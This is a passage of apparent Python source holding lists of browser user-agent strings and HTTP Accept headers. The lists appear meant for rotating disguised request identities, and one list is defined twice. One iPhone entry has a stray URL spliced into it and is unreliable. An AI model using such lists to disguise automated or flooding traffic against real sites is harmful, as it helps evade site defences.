'Mozilla/5.0 (Windows; U; Windows NT 5.1; tr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8 ( .NET CLR 3.5.30729; .NET4.0E)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/532.9 (KHTML, like Gecko) Chrome/5.0.310.0 Safari/532.9',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/533.17.8 (KHTML, like Gecko) Version/5.0.1 Safari/533.17.8',
'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/527 (KHTML, like Gecko, Safari/419.3) Arora/0.6 (Change: )', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/533.1 (KHTML, like Gecko) Maxthon/3.0.8.2 Safari/533.1', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/534.14 (KHTML, like Gecko) Chrome/9.0.601.0 Safari/534.14', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 GTB5', 'Mozilla/5.0 (Windows; U; Windows NT 6.0 x64; en-US; rv:1.9pre) Gecko/2008072421 Minefield/3.0.2pre', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-GB; rv:1.9.1.17) Gecko/20110123 (like Firefox/3.x) SeaMonkey/2.0.12', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.8 (KHTML, like Gecko) Chrome/4.0.249.0 Safari/532.8',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/533.19.4 (KHTML, like Gecko) Version/5.0.2 Safari/533.18.5', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.14 (KHTML, like Gecko) Chrome/10.0.601.0 Safari/534.14', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20', 'Mozilla/5.0 (Windows; U; Windows XP) Gecko MultiZilla/1.6.1.0a', 'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.2b) Gecko/20021001 Phoenix/0.2', 'Mozilla/5.0 (X11; FreeBSD amd64; rv:5.0) Gecko/20100101 Firefox/5.0', 'Mozilla/5.0 (X11; Linux i686) AppleWebKit/534.34 (KHTML, like Gecko) QupZilla/1.2.0 Safari/534.34',
'Mozilla/5.0 (X11; Linux i686) AppleWebKit/535.1 (KHTML, like Gecko) Ubuntu/11.04 Chromium/14.0.825.0 Chrome/14.0.825.0 Safari/535.1',
'Mozilla/5.0 (X11; Linux i686) AppleWebKit/535.2 (KHTML, like Gecko) Ubuntu/11.10 Chromium/15.0.874.120 Chrome/15.0.874.120 Safari/535.2',
'Mozilla/5.0 (X11; Linux i686 on x86_64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1', 'Mozilla/5.0 (X11; Linux i686 on x86_64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Fennec/2.0.1', 'Mozilla/5.0 (X11; Linux i686; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 SeaMonkey/2.7.1',
'Mozilla/5.0 (X11; Linux i686; rv:12.0) Gecko/20100101 Firefox/12.0 ',
'Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1',
'Mozilla/5.0 (X11; Linux i686; rv:2.0b6pre) Gecko/20100907 Firefox/4.0b6pre',
'Mozilla/5.0 (X11; Linux i686; rv:5.0) Gecko/20100101 Firefox/5.0',
'Mozilla/5.0 (X11; Linux i686; rv:6.0a2) Gecko/20110615 Firefox/6.0a2 Iceweasel/6.0a2', 'Mozilla/5.0 (X11; Linux i686; rv:6.0) Gecko/20100101 Firefox/6.0', 'Mozilla/5.0 (X11; Linux i686; rv:8.0) Gecko/20100101 Firefox/8.0', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.24 (KHTML, like Gecko) Ubuntu/10.10 Chromium/12.0.703.0 Chrome/12.0.703.0 Safari/534.24',
'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.20 Safari/535.1',
'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.9 Safari/536.5',
'Mozilla/5.0 (X11; Linux x86_64; en-US; rv:2.0b2pre) Gecko/20100712 Minefield/4.0b2pre',
'Mozilla/5.0 (X11; Linux x86_64; rv:10.0.1) Gecko/20100101 Firefox/10.0.1',
'Mozilla/5.0 (X11; Linux x86_64; rv:11.0a2) Gecko/20111230 Firefox/11.0a2 Iceweasel/11.0a2',
'Mozilla/5.0 (X11; Linux x86_64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1',
'Mozilla/5.0 (X11; Linux x86_64; rv:2.2a1pre) Gecko/20100101 Firefox/4.2a1pre',
'Mozilla/5.0 (X11; Linux x86_64; rv:5.0) Gecko/20100101 Firefox/5.0 Iceweasel/5.0',
'Mozilla/5.0 (X11; Linux x86_64; rv:7.0a1) Gecko/20110623 Firefox/7.0a1',
'Mozilla/5.0 (X11; U; FreeBSD amd64; en-us) AppleWebKit/531.2 (KHTML, like Gecko) Safari/531.2 Epiphany/2.30.0',
'Mozilla/5.0 (X11; U; FreeBSD i386; de-CH; rv:1.9.2.8) Gecko/20100729 Firefox/3.6.8',
'Mozilla/5.0 (X11; U; FreeBSD i386; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.207.0 Safari/532.0',
'Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.6) Gecko/20040406 Galeon/1.3.15',
'Mozilla/5.0 (X11; U; FreeBSD; i386; en-US; rv:1.7) Gecko',
'Mozilla/5.0 (X11; U; FreeBSD x86_64; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16',
'Mozilla/5.0 (X11; U; Linux arm7tdmi; rv:1.8.1.11) Gecko/20071130 Minimo/0.025',
'Mozilla/5.0 (X11; U; Linux armv61; en-US; rv:1.9.1b2pre) Gecko/20081015 Fennec/1.0a1',
'Mozilla/5.0 (X11; U; Linux armv6l; rv 1.8.1.5pre) Gecko/20070619 Minimo/0.020',
'Mozilla/5.0 (X11; U; Linux; en-US) AppleWebKit/527 (KHTML, like Gecko, Safari/419.3) Arora/0.10.1',
'Mozilla/5.0 (X11; U; Linux i586; en-US; rv:1.7.3) Gecko/20040924 Epiphany/1.4.4 (Ubuntu)',
'Mozilla/5.0 (X11; U; Linux i686; en-us) AppleWebKit/528.5 (KHTML, like Gecko, Safari/528.5 ) lt-GtkLauncher',
'Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/532.4 (KHTML, like Gecko) Chrome/4.0.237.0 Safari/532.4 Debian',
'Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/532.8 (KHTML, like Gecko) Chrome/4.0.277.0 Safari/532.8',
'Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/534.15 (KHTML, like Gecko) Ubuntu/10.10 Chromium/10.0.613.0 Chrome/10.0.613.0 Safari/534.15',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.6) Gecko/20040614 Firefox/0.8',
'Mozilla/5.0 (X11; U; Linux; i686; en-US; rv:1.6) Gecko Debian/1.6-7',
'Mozilla/5.0 (X11; U; Linux; i686; en-US; rv:1.6) Gecko Epiphany/1.2.8',
'Mozilla/5.0 (X11; U; Linux; i686; en-US; rv:1.6) Gecko Galeon/1.3.14',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7 MG(Novarra-Vision/6.9)',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.16) Gecko/20080716 (Gentoo) Galeon/2.0.6',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1) Gecko/20061024 Firefox/2.0 (Swiftfox)',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.11) Gecko/2009060309 Ubuntu/9.10 (karmic) Firefox/3.0.11',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.8) Gecko Galeon/2.0.6 (Ubuntu 2.0.6-2)',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.16) Gecko/20120421 Gecko Firefox/11.0',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.2) Gecko/20090803 Ubuntu/9.04 (jaunty) Shiretoko/3.5.2',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9a3pre) Gecko/20070330',
'Mozilla/5.0 (X11; U; Linux i686; it; rv:1.9.2.3) Gecko/20100406 Firefox/3.6.3 (Swiftfox)',
'Mozilla/5.0 (X11; U; Linux i686; pl-PL; rv:1.9.0.2) Gecko/20121223 Ubuntu/9.25 (jaunty) Firefox/3.8',
'Mozilla/5.0 (X11; U; Linux i686; pt-PT; rv:1.9.2.3) Gecko/20100402 Iceweasel/3.6.3 (like Firefox/3.6.3) GTB7.0',
'Mozilla/5.0 (X11; U; Linux ppc; en-US; rv:1.8.1.13) Gecko/20080313 Iceape/1.1.9 (Debian-1.1.9-5)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/532.9 (KHTML, like Gecko) Chrome/5.0.309.0 Safari/532.9',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.15 (KHTML, like Gecko) Chrome/10.0.613.0 Safari/534.15',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.514.0 Safari/534.7',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/540.0 (KHTML, like Gecko) Ubuntu/10.10 Chrome/9.1.0.0 Safari/540.0',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.3) Gecko/2008092814 (Debian-3.0.1-1)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.13) Gecko/20100916 Iceape/2.0.8',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.17) Gecko/20110123 SeaMonkey/2.0.12',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20091020 Linux Mint/8 (Helena) Firefox/3.5.3',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.5) Gecko/20091107 Firefox/3.5.5',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.9) Gecko/20100915 Gentoo Firefox/3.6.9',
'Mozilla/5.0 (X11; U; Linux x86_64; sv-SE; rv:1.8.1.12) Gecko/20080207 Ubuntu/7.10 (gutsy) Firefox/2.0.0.12',
'Mozilla/5.0 (X11; U; Linux x86_64; us; rv:1.9.1.19) Gecko/20110430 shadowfox/7.0 (like Firefox/7.0',
'Mozilla/5.0 (X11; U; NetBSD amd64; en-US; rv:1.9.2.15) Gecko/20110308 Namoroka/3.6.15',
'Mozilla/5.0 (X11; U; OpenBSD arm; en-us) AppleWebKit/531.2 (KHTML, like Gecko) Safari/531.2 Epiphany/2.30.0',
'Mozilla/5.0 (X11; U; OpenBSD i386; en-US) AppleWebKit/533.3 (KHTML, like Gecko) Chrome/5.0.359.0 Safari/533.3',
'Mozilla/5.0 (X11; U; OpenBSD i386; en-US; rv:1.9.1) Gecko/20090702 Firefox/3.5',
'Mozilla/5.0 (X11; U; SunOS i86pc; en-US; rv:1.8.1.12) Gecko/20080303 SeaMonkey/1.1.8',
'Mozilla/5.0 (X11; U; SunOS i86pc; en-US; rv:1.9.1b3) Gecko/20090429 Firefox/3.1b3',
'Mozilla/5.0 (X11; U; SunOS sun4m; en-US; rv:1.4b) Gecko/20030517 Mozilla Firebird/0.6',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/532.9 (KHTML, like Gecko) Chrome/5.0.309.0 Safari/532.9',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.15 (KHTML, like Gecko) Chrome/10.0.613.0 Safari/534.15',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.514.0 Safari/534.7', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/540.0 (KHTML, like Gecko) Ubuntu/10.10 Chrome/9.1.0.0 Safari/540.0', 'Mozilla/5.0 (Linux; Android 7.1.1; MI 6 Build/NMF26X; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/57.0.2987.132 MQQBrowser/6.2 TBS/043807 Mobile Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/WIFI Language/zh_CN', 'Mozilla/5.0 (Linux; Android 7.1.1; OD103 Build/NMF26F; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043632 Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/4G Language/zh_CN',
'Mozilla/5.0 (Linux; Android 6.0.1; SM919 Build/MXB48T; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043632 Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/WIFI Language/zh_CN',
'Mozilla/5.0 (Linux; Android 5.1.1; vivo X6S A Build/LMY47V; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043632 Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/WIFI Language/zh_CN',
'Mozilla/5.0 (Linux; Android 5.1; HUAWEI TAG-AL00 Build/HUAWEITAG-AL00; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043622 Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/4G Language/zh_CN',
'Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_2 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mobile/13F69 MicroMessenger/6.6.1 NetType/4G Language/zh_CN',
'Mozilla/5.0 (iPhone; CPU iPhone OS 11_2_2 like Mac https://m.baidu.com/mip/c/s/zhangzifan.com/wechat-user-agent.htmlOS X) AppleWebKit/604.4.7 (KHTML, like Gecko) Mobile/15C202 MicroMessenger/6.6.1 NetType/4G Language/zh_CN',
'Mozilla/5.0 (iPhone; CPU iPhone OS 11_1_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Mobile/15B150 MicroMessenger/6.6.1 NetType/WIFI Language/zh_CN',
"Mozilla/5.0 (Android; Linux armv7l; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 Fennec/10.0.1",
"Mozilla/5.0 (Android; Linux armv7l; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Fennec/2.0.1",
"Mozilla/5.0 (WindowsCE 6.0; rv:2.0.1) Gecko/20100101 Firefox/4.0.1",
"Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0",
"Mozilla/5.0 (Windows NT 5.2; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 SeaMonkey/2.7.1",
"Mozilla/5.0 (Windows NT 6.0) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2",
"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/18.6.872.0 Safari/535.2 UNTRUSTED/1.0 3gpp-gba UNTRUSTED/1.0",
"Mozilla/5.0 (Windows NT 6.1; rv:12.0) Gecko/20120403211507 Firefox/12.0",
"Mozilla/5.0 (Windows NT 6.1; rv:2.0.1) Gecko/20100101 Firefox/4.0.1",
"Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.27 (KHTML, like Gecko) Chrome/12.0.712.0 Safari/534.27",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.24 Safari/535.1",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.36 Safari/535.7",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.6 (KHTML, like Gecko) Chrome/20.0.1092.0 Safari/536.6",
"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:10.0.1) Gecko/20100101 Firefox/10.0.1",
"Mozilla/5.0 (Linux; Android 7.1.1; MI 6 Build/NMF26X; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/57.0.2987.132 MQQBrowser/6.2 TBS/043807 Mobile Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/WIFI Language/zh_CN",
"Mozilla/5.0 (Linux; Android 7.1.1; OD103 Build/NMF26F; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043632 Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/4G Language/zh_CN",
"Mozilla/5.0 (Linux; Android 6.0.1; SM919 Build/MXB48T; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043632 Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/WIFI Language/zh_CN",
"Mozilla/5.0 (Linux; Android 5.1.1; vivo X6S A Build/LMY47V; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043632 Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/WIFI Language/zh_CN",
"Mozilla/5.0 (Linux; Android 5.1; HUAWEI TAG-AL00 Build/HUAWEITAG-AL00; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043622 Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/4G Language/zh_CN",
'Mozilla/5.0 (iphone x Build/MXB48T; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043632 Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/WIFI Language/zh_CN']
acceptall = [
'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\n',
'Accept-Encoding: gzip, deflate\r\n',
'Accept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\n',
'Accept: text/html, application/xhtml+xml, application/xml;q=0.9, */*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Charset: iso-8859-1\r\nAccept-Encoding: gzip\r\n',
'Accept: application/xml,application/xhtml+xml,text/html;q=0.9, text/plain;q=0.8,image/png,*/*;q=0.5\r\nAccept-Charset: iso-8859-1\r\n',
'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Encoding: br;q=1.0, gzip;q=0.8, *;q=0.1\r\nAccept-Language: utf-8, iso-8859-1;q=0.5, *;q=0.1\r\nAccept-Charset: utf-8, iso-8859-1;q=0.5\r\n',
'Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, application/x-shockwave-flash, application/msword, */*\r\nAccept-Language: en-US,en;q=0.5\r\n',
'Accept: text/html, application/xhtml+xml, image/jxr, */*\r\nAccept-Encoding: gzip\r\nAccept-Charset: utf-8, iso-8859-1;q=0.5\r\nAccept-Language: utf-8, iso-8859-1;q=0.5, *;q=0.1\r\n',
'Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/webp, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Encoding: gzip\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Charset: utf-8, iso-8859-1;q=0.5\r\n,Accept: text/html, application/xhtml+xml, application/xml;q=0.9, */*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\n',
'Accept-Charset: utf-8, iso-8859-1;q=0.5\r\nAccept-Language: utf-8, iso-8859-1;q=0.5, *;q=0.1\r\n',
'Accept: text/html, application/xhtml+xml',
'Accept-Language: en-US,en;q=0.5\r\n',
'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Encoding: br;q=1.0, gzip;q=0.8, *;q=0.1\r\n',
'Accept: text/plain;q=0.8,image/png,*/*;q=0.5\r\nAccept-Charset: iso-8859-1\r\n']
acceptall = [
'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\n',
'Accept-Encoding: gzip, deflate\r\n',
'Accept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\n',
'Accept: text/html, application/xhtml+xml, application/xml;q=0.9, */*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Charset: iso-8859-1\r\nAccept-Encoding: gzip\r\n',
'Accept: application/xml,application/xhtml+xml,text/html;q=0.9, text/plain;q=0.8,image/png,*/*;q=0.5\r\nAccept-Charset: iso-8859-1\r\n',
'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Encoding: br;q=1.0, gzip;q=0.8, *;q=0.1\r\nAccept-Language: utf-8, iso-8859-1;q=0.5, *;q=0.1\r\nAccept-Charset: utf-8, iso-8859-1;q=0.5\r\n',
'Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, application/x-shockwave-flash, application/msword, */*\r\nAccept-Language: en-US,en;q=0.5\r\n',
'Accept: text/html, application/xhtml+xml, image/jxr, */*\r\nAccept-Encoding: gzip\r\nAccept-Charset: utf-8, iso-8859-1;q=0.5\r\nAccept-Language: utf-8, iso-8859-1;q=0.5, *;q=0.1\r\n',
'Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/webp, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Encoding: gzip\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Charset: utf-8, iso-8859-1;q=0.5\r\n,Accept: text/html, application/xhtml+xml, application/xml;q=0.9, */*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\n',
'Accept-Charset: utf-8, iso-8859-1;q=0.5\r\nAccept-Language: utf-8, iso-8859-1;q=0.5, *;q=0.1\r\n',
'Accept: text/html, application/xhtml+xml',
'Accept-Language: en-US,en;q=0.5\r\n',
'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Encoding: br;q=1.0, gzip;q=0.8, *;q=0.1\r\n',
'Accept: text/plain;q=0.8,image/png,*/*;q=0.5\r\nAccept-Charset: iso-8859-1\r\n'
]
mozila = [
'Mozilla/5.0 (Android; Linux armv7l; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 Fennec/10.0.1', 'Mozilla/5.0 (Android; Linux armv7l; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Fennec/2.0.1', 'Mozilla/5.0 (WindowsCE 6.0; rv:2.0.1) Gecko/20100101 Firefox/4.0.1',
'Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0',
'Mozilla/5.0 (Windows NT 5.2; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 SeaMonkey/2.7.1',
'Mozilla/5.0 (Windows NT 6.0) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2',
'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/18.6.872.0 Safari/535.2 UNTRUSTED/1.0 3gpp-gba UNTRUSTED/1.0',
'Mozilla/5.0 (Windows NT 6.1; rv:12.0) Gecko/20120403211507 Firefox/12.0',
'Mozilla/5.0 (Windows NT 6.1; rv:2.0.1) Gecko/20100101 Firefox/4.0.1',
'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1',
'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.27 (KHTML, like Gecko) Chrome/12.0.712.0 Safari/534.27',
'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.24 Safari/535.1',
'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.36 Safari/535.7',
'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.6 (KHTML, like Gecko) Chrome/20.0.1092.0 Safari/536.6',
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:10.0.1) Gecko/20100101 Firefox/10.0.1',
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20120427 Firefox/15.0a1',
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0b4pre) Gecko/20100815 Minefield/4.0b4pre',
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0a2) Gecko/20110622 Firefox/6.0a2',
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:7.0.1) Gecko/20100101 Firefox/7.0.1',
'Mozilla/5.0 (Windows NT 6.2) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1061.1 Safari/536.3',
'Mozilla/5.0 (Windows; U; ; en-NZ) AppleWebKit/527 (KHTML, like Gecko, Safari/419.3) Arora/0.8.0',
'Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.4) Gecko Netscape/7.1 (ax)',
'Mozilla/5.0 (Windows; U; Windows CE 5.1; rv:1.8.1a3) Gecko/20060610 Minimo/0.016',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.514.0 Safari/534.7',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.23) Gecko/20090825 SeaMonkey/1.1.18',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; tr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8 ( .NET CLR 3.5.30729; .NET4.0E)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/532.9 (KHTML, like Gecko) Chrome/5.0.310.0 Safari/532.9',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/533.17.8 (KHTML, like Gecko) Version/5.0.1 Safari/533.17.8',
'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/527 (KHTML, like Gecko, Safari/419.3) Arora/0.6 (Change: )', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/533.1 (KHTML, like Gecko) Maxthon/3.0.8.2 Safari/533.1', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/534.14 (KHTML, like Gecko) Chrome/9.0.601.0 Safari/534.14', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 GTB5', 'Mozilla/5.0 (Windows; U; Windows NT 6.0 x64; en-US; rv:1.9pre) Gecko/2008072421 Minefield/3.0.2pre', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-GB; rv:1.9.1.17) Gecko/20110123 (like Firefox/3.x) SeaMonkey/2.0.12', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.8 (KHTML, like Gecko) Chrome/4.0.249.0 Safari/532.8',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/533.19.4 (KHTML, like Gecko) Version/5.0.2 Safari/533.18.5', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.14 (KHTML, like Gecko) Chrome/10.0.601.0 Safari/534.14', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20', 'Mozilla/5.0 (Windows; U; Windows XP) Gecko MultiZilla/1.6.1.0a', 'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.2b) Gecko/20021001 Phoenix/0.2', 'Mozilla/5.0 (X11; FreeBSD amd64; rv:5.0) Gecko/20100101 Firefox/5.0', 'Mozilla/5.0 (X11; Linux i686) AppleWebKit/534.34 (KHTML, like Gecko) QupZilla/1.2.0 Safari/534.34',
'Mozilla/5.0 (X11; Linux i686) AppleWebKit/535.1 (KHTML, like Gecko) Ubuntu/11.04 Chromium/14.0.825.0 Chrome/14.0.825.0 Safari/535.1',
